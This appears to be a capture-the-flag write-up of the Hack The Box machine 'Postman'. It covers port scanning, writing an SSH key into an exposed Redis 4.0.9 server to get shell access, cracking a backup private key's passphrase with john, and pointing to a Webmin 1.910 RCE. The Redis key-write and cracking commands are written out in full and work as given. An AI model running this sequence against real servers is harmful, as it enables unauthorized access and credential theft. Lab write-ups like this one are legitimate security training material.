$ nmap -p- --min-rate 5000 10.129.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 02:05 EDT
Nmap scan report for 10.129.2.1
Host is up (0.0065s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
10000/tcp open snet-sensor-mgmt
Redis is open interestingly. So we can try to check for vulnerabilities there first.
SSH Key Write
We can connect to Redis using redis-cli.
$ redis-cli -h 10.129.2.1
10.129.2.1:6379> info
# Server
redis_version:4.0.9
The Redis version is really outdated, so we can try to find some exploits regarding it. Hacktricks has some methods of exploiting this by writing SSH keys.
Just follow these commands:
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.129.2.1 -x set ssh_key
redis-cli -h 10.129.2.1
config set dir /var/lib/redis/.ssh
config set dbfilename "authorized_keys"
save
exit
chmod 600 id_rsa
ssh -i id_rsa redis@10.129.2.1
This would generate a pair of keys, and afterwards write it into the machine as the keys for redis. Then we can directly SSH in.
Privilege Escalation
User SSH Key
Within the /home directory, we find the user is called Matt
redis@Postman:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Sep 11 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
drwxr-xr-x 6 Matt Matt 4096 Sep 11 2019 Matt
Within the /opt directory, there's a password encrypted id_rsa file.
redis@Postman:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Sep 11 2019 .
drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 id_rsa.bak
We can download this back to our machine and use ssh2john and john to crack it.
$ ssh2john id_rsa.bak > hash.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
1g 0:00:00:00 DONE (2023-05-02 02:17) 9.090g/s 2243Kp/s 2243Kc/s 2243KC/s confused6..comett
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Great! We now have a password for the user. We can use su to change from redis to Matt.
We can then grab the user flag.
Webmin
In the earlier nmap scan, we found that there were some HTTP ports that I didn't touch till now. Port 10000 has a Webmin instance running, and we can login using the credentials we just found.
This was running Webmin 1.910, which is vulnerable to RCE through Package Updates. There are tons of PoCs online.
